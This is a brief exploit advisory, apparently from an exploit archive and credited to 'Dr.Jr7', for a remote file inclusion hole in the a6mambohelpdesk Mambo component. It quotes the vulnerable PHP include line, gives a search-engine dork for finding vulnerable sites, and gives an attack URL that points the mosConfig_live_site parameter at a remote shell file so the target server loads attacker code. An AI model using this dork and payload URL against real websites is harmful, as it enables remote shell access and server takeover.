a6mambohelpdesk Mambo Component <= 18RC1 Remote Include Vulnerability
Rish : High
Class : Remote
Script : a6mambohelpdesk
codes
<?
include( "$mosConfig_live_site/components/com_a6mambohelpdesk/about.html" );
?>
d0rkiz : allinurl:"com_a6mambohelpdesk"
http://www.site.com/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://shell.txt
by Dr.Jr7